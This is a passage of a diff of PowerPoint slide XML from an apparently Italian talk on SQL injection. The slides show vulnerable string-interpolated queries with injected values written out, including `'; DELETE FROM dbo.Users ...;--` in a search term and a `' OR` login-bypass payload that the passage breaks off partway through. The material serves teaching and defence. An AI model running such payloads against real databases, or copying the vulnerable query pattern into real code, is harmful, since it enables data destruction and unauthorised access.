-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr lvl="0" algn="ctr"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Stringhe</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> di </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>ricerca</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>interessanti</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="129" name="Google Shape;129;p31">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB47F812-6A46-0E98-23B9-DBE8856ECDCC}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr preferRelativeResize="0"/>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId3">
-            <a:alphaModFix/>
-          </a:blip>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4116500" y="448013"/>
-            <a:ext cx="911000" cy="911000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-      </p:pic>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="130" name="Google Shape;130;p31">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B811E23C-2978-F612-C2DF-7980B4570203}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title" idx="2"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1128450" y="2195169"/>
-            <a:ext cx="6887100" cy="2292051"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="127000" lvl="0">
-              <a:lnSpc>
-                <a:spcPct val="115000"/>
-              </a:lnSpc>
-              <a:buClr>
-                <a:srgbClr val="D93232"/>
-              </a:buClr>
-              <a:buSzPts val="1600"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>SELECT</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>	Id, Title, StartDate, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>EndDate</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>, Result, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>UserId</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>FROM </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>dbo.Courses</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>WHERE </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>UserId</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t> = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="accent1"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>{</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:solidFill>
-                  <a:schemeClr val="accent5">
-                    <a:lumMod val="60000"/>
-                    <a:lumOff val="40000"/>
-                  </a:schemeClr>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>userId</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="accent1"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>}</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>	AND Title LIKE '%</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>'; DELETE FROM </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>dbo.Users</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t> WHERE Email = 'pippo@disney.com';--</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>%' ORDER BY StartDate;</a:t>
-            </a:r>
-            <a:endParaRPr sz="1400" dirty="0">
-              <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2679991569"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide28.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 127">
-          <a:extLst>
-            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DCF0E6B-8D63-563B-DC82-D5B8ACDC032D}"/>
-            </a:ext>
-          </a:extLst>
-        </p:cNvPr>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="128" name="Google Shape;128;p31">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C50D4FA1-0367-8DEC-38C0-F4BADFC40D4F}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1290150" y="1454970"/>
-            <a:ext cx="6563700" cy="572700"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Una query semplice </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>che</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>implementerò</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>così</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="129" name="Google Shape;129;p31">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31906B54-350C-2399-C432-2B0EC9A07C89}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr preferRelativeResize="0"/>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId3">
-            <a:alphaModFix/>
-          </a:blip>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4116500" y="448013"/>
-            <a:ext cx="911000" cy="911000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-      </p:pic>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="3" name="Picture 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FC90AEC-DBB7-DB6F-FEF1-8892A7B32D42}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1"/>
-          </p:cNvPicPr>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId4"/>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1669653" y="2421134"/>
-            <a:ext cx="6715693" cy="1799806"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281164860"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide29.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:bg>
-      <p:bgPr>
-        <a:solidFill>
-          <a:srgbClr val="D93232"/>
-        </a:solidFill>
-        <a:effectLst/>
-      </p:bgPr>
-    </p:bg>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 169"/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="170" name="Google Shape;170;p36"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="ctrTitle"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="311700" y="2894226"/>
-            <a:ext cx="8520600" cy="1199400"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en" dirty="0"/>
-              <a:t>Grazie!</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1700" u="sng" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="hlink"/>
-                </a:solidFill>
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>https://github.com/CodicePlastico/BibeCatalogue</a:t>
-            </a:r>
-            <a:endParaRPr sz="1700" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
   </p:cSld>
   <p:clrMapOvr>
     <a:masterClrMapping/>
@@ -18506,7 +19294,15 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Meglio: </a:t>
+              <a:t>O </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>meglio</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
@@ -18633,7 +19429,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide4.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide30.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -18641,7 +19437,7 @@
         <p:cNvPr id="1" name="Shape 127">
           <a:extLst>
             <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0F07A14-8BDD-4AC8-E91E-28AEB02041A3}"/>
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DCF0E6B-8D63-563B-DC82-D5B8ACDC032D}"/>
             </a:ext>
           </a:extLst>
         </p:cNvPr>
@@ -18661,7 +19457,7 @@
           <p:cNvPr id="128" name="Google Shape;128;p31">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7015428D-F016-45C9-B848-D95AC5194E40}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C50D4FA1-0367-8DEC-38C0-F4BADFC40D4F}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -18687,18 +19483,18 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr lvl="0" algn="ctr"/>
+            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Meglio: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>una</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> query semplice </a:t>
+              <a:t>Una query semplice </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
@@ -18706,27 +19502,11 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t> non </a:t>
+              <a:t> </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
               <a:t>implementerò</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>mai</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>più</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -18745,7 +19525,7 @@
           <p:cNvPr id="129" name="Google Shape;129;p31">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9282C9D5-8C06-ACA4-6A0C-BD087AA4951C}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31906B54-350C-2399-C432-2B0EC9A07C89}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -18774,12 +19554,172 @@
           </a:ln>
         </p:spPr>
       </p:pic>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="3" name="Picture 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FC90AEC-DBB7-DB6F-FEF1-8892A7B32D42}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId4"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1669653" y="2421134"/>
+            <a:ext cx="6715693" cy="1799806"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281164860"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide31.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 127">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{842ECFBC-E993-6FFB-BF6C-3A73BE033B47}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="128" name="Google Shape;128;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{585BA0E2-AC16-B48C-AC9B-5DC26A89AD8F}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1290150" y="1454970"/>
+            <a:ext cx="6563700" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr lvl="0" algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Una query semplice </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>che</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>implementerò</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>così</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="129" name="Google Shape;129;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08E6A1AA-B8C4-7F1A-E411-BAE292B067E7}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
       <p:sp>
         <p:nvSpPr>
           <p:cNvPr id="130" name="Google Shape;130;p31">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3122D2B9-5867-C7DD-04F6-EE7FEDC591D6}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AD7780F-67DE-71ED-089F-F2CF4EAC75B0}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -18857,7 +19797,7 @@
               <a:rPr lang="en-US" sz="1600" dirty="0">
                 <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
               </a:rPr>
-              <a:t>WHERE Email = '{email}'</a:t>
+              <a:t>WHERE Email = 'test@example.com'</a:t>
             </a:r>
             <a:br>
               <a:rPr lang="en-US" sz="1600" dirty="0">
@@ -18868,7 +19808,85 @@
               <a:rPr lang="en-US" sz="1600" dirty="0">
                 <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
               </a:rPr>
-              <a:t>	AND Password = '{password}';</a:t>
+              <a:t>	AND Password = '</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="92D050"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>'</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>' OR </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0">
